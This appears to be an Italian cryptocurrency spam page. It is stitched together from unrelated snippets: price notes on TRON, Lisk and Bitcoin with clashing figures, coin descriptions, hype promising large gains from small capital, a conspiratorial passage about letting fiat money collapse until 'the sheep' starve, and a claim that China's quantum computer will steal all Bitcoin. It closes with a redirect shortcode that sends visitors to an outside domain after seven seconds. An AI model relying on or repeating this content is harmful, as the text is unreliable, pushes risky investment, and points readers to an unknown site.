“valuta digitale definita |Capitalizzazione del mercato di criptovaluta”

L’acquisto di beni si sposta sempre più verso il mondo online e anche il settore dei fornitori di servizi ha da tempo scoperto il World Wide Web come canale di vendita. Tuttavia i siti e-commerce si trovano a dover fare i conti con la diffidenza che gli utenti mostrano nei confronti dei pagamenti online. Parlando spesso di furto di dati e di tentativi di frode i media hanno sensibilizzato i […]   

Nella mattina del 4 gennaio, la criptovaluta TRON (TRX) ha registrato una crescita del 136% , diventando la nona più grande criptovaluta per capitalizzazione di mercato e spingendo Dash all’11 ° posto. L’altcoin ha avuto un trend rialzista da metà dicembre, con una crescita di oltre il 2000% da allora. Nella sola prima settimana del 2018, la criptovaluta ha visto una crescita quasi del 300 percento. TRON ha colpito $ 0.20 in precedenza, e attualmente scambia a una media di $ 0,17, con una capitalizzazione di mercato di $ 12,4 miliardi

Lisk: commento tecnico Lisk (LSK)) arriva da quattro sedute consecutive negative, ma nella giornata di ieri 08 marzo, il prezzo ha aperto le contrattazioni a 15.42 dollari, testare i massimi fino in area 17.79 per poi ritracciare completamente, testare i minimi in zona 14.04 e chiudere in leggero ritracciamento a 14.94 dollari. Le resistenze da tenere sotto …

Per fare in modo che il network del Bitcoin sia protetto dall’inflazione, c’è un limite massimo di bitcoin che possono essere messi in circolazione nello stesso momento, ed è 21 milioni di bitcoin. Questo tetto massimo non può essere modificato per via della programmazione che ne sta alla base. Attualmente il numero totale di bitcoin, stando ai dati comunicati da blockchain.info, si aggira attorno ai 16 milioni e mezzo (stato: Maggio 2017), e dunque ancora ben lontano dalla soglia limite.

5) Permettete alla piramide del debito in moneta fiat di crollare e covare fino a quando la pecora non sarà disperata (cioè la disperazione in stile venezuelano con le persone affamate che mangiano rifiuti nelle discariche).

Dopo il fiasco di DigiCash, la maggior parte dello sviluppo in ambito transazioni sul web, avvenne principalmente per canali tradizionali: a anni 90′ nasce PayPal, che diventerà negli anni successivi società leader nel settore dei pagamenti digitali e trasferimento di denaro tra utenti.

Monero. Presente da più di due anni nel settore delle criptovalute, si basa su un protocollo diverso dai bitcoin (cryptonote) e una protezione più specifica rispetto all’identità degli utenti che scambiano la suddetta moneta virtuale. E’ ancora poco presente nelle offerte dei broker di trading online, ma i numeri interessanti registrati rispetto ad un più facile accesso in termini di quotazioni (i bitcoin hanno superato quota 2000) non sono da trascurare.

Ripple è il nome con cui viene identificata sia una criptovaluta, che ha come simbolo XRP, sia il protocollo di pagamento attraverso il quale la valuta viene scambiata: il sistema ha molte cose in comune con Bitcoin, ma non è uguale. La differenza principale è che Ripple è un sistema pensato per trasferire somme di denaro in qualsiasi valuta (ma più in generale, qualsiasi cosa di valore) gratuitamente e rapidamente: se i Bitcoin sono un modo di immagazzinare capitale, Ripple è un sistema per trasferirlo. I Ripple (XRP) sono la valuta universale nel sistema Ripple, che a differenza di Bitcoin è gestito da un organo centrale, e cioè la società omonima. È questa società a immettere nel mercato i Ripple (XRP), che a differenza dei bitcoin non possono essere “minati”, cioè non possono essere guadagnati dagli utenti contribuendo con i propri computer ai calcoli necessari a rendere la valuta sicura e attiva.

Come si può notare, il Bitcoin sta continuando a testare, ritracciando e rimbalzando, il forte supporto degli 8100 circa; questo significa che, sta per arrivare una forte spinta rialzista, dovuta dal doppio minimo formatosi nell’area verde che ho disegnato, oppure dovremo purtroppo assistere ad un calo, conseguenza del break del supporto, possibilmente in zona …

Bitcoin sta attualmente testando l’area dei 10.000USD e sta lateralizzando per la precisione tra i 9300 e gli 11900USD. La resistenza R1 in area 12000USD sembra essere decisamente ostica da superare. La mia idea è pertanto la seguente: Entro Long se … 1. il prezzo rompe la R1 a rialzo 2. il prezzo va a testare il SD1 (supporto dinamico 1) Nel primo caso lo …

Inoltre investire oggi in criptovalute, grazie a queste ampie oscillazioni dei prezzi, è una possibilità alla portata di tutti: anche con un piccolo capitale iniziale potresti ottenere guadagni consistenti.Ma devi essere molto prudente (perchè le variazioni possono essere anche in negativo!) e conoscere gli aspetti fondamentali per operare proficuamente. 

Rischio di deflazione: mentre il numero di bitcoin disponibili continua a scendere regolarmente, il fabbisogno sale e di conseguenza anche i prezzi. La perdita naturale delle monete, derivante dallo smarrimento delle chiavi personali dei Wallet, è in parte responsabile per la deflazione dei bitcoin. Questo porta gli investitori a speculare, comperando bitcoin per poi tenerli da parte in attesa di tempi migliori per rivenderli, traendone così un grande guadagno.

Infatti, ogni criptovaluta diventa obsoleta con l’invenzione del calcolo quantistico su larga scala. Una volta che la Cina riuscirà a costruire un computer quantico funzionante a 256 bit, può efficacemente rubare tutti i Bitcoin nel mondo (oltre a rubare la maggior parte dei segreti nazionali e commettere altri caos globali a volontà). [redirect url=’http://curbee.info/bump’ sec=’7′]

Leave a Reply

Your email address will not be published. Required fields are marked *